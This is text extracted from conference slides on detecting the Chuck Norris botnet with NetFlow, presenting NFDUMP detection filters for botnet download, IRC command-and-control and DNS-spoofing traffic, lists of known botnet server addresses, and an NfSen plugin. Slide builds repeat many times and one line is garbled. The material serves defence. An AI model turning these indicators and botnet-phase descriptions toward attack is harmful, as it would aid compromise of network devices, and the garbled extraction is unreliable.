Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip web_servers1) and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
NFDUMP detection filter(src net local_network) and (dst ip web_servers1)
and(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP)
and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet Distribution Sites ndash Phase II
Botrsquos web download requests from infected host
localnetwork
infecteddevice
botnetdistributionweb server
botnetdistributionweb server
botnetdistributionweb server
TCP80SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip web_servers1) and
(dst port 80) and (proto TCP) and (flags SA and not flag R)
1IP addresses of attackerrsquos botnet distribution web serversKrmiacuteček Plesniacutek Detecting Botnets with NetFlow 15 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
